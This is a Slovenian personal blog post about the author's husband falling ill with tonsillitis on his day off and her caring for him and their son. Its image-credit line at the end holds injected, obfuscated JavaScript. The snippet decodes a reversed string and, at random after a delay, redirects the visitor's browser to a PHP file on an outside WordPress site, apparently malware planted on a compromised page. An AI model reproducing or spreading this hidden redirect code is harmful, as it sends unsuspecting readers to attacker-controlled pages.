Mož in angina

Kot že verjetno veste, moj partner dela popoldne. Vsake toliko pa se zgodi, da je prost.
Kaj se takrat zgodi?

Zboli. Na takšen ali drugačen način. Ali uho, ali glava ali karkoli.

Pri nas obstajata dva načina preživljanja prostih dni. Prvi je, da gremo na izlet. To poskušamo res vsakič, ko imamo dve uri časa. Drugi način pa je ta, da mož obleži, jaz pa potem skrbim za vse.
Tokrat z angino.

Nekaj dni ga je že bolelo grlo, danes pa je obležal. Prav nič ni bilo od njega, razen kurjenja telesne temperature vse tja do 39 stopinj. Zato sva z Marsom dan preživela sama.

Partner se grozno počuti. Že samo fizično, kaj šele, ko dodamo to, da ne more še tisto malo časa, ko ima možnost, normalno preživeti s sinom. Jaz pa sem tudi že čisto brez energije. Ne samo skrb za sina, vse je padlo name.

Moški so v času bolezni še posebej bogi. Ko njihova vročina pride čez 37, se počutijo približno tako, kot se počutimo ženske med rojevanjem. Totalno izmozgani so, treba jim je vlažiti ustnice, pomagati vstati iz postelje, izmeriti vročino in jih crkljati kot dojenčke.

Malo za šalo, malo za res.

Kar pomaga obolelemu moškemu je prava juha. To je najboljša rešitev, ko pride do katere koli bolezni. Juha, pomarančni (domači) sok in počitek. In to je dobil, da bo čimprej mimo teh muk.

Angina je bedna. Boli te vse in komaj se premikaš. Srčno upam, da kmalu ozdravi, ker trenutno od njega nimam nič. Še manj ima on od sebe in naših trenutkov.

Toliko za danes.

Z Ljubeznijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/sickness?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash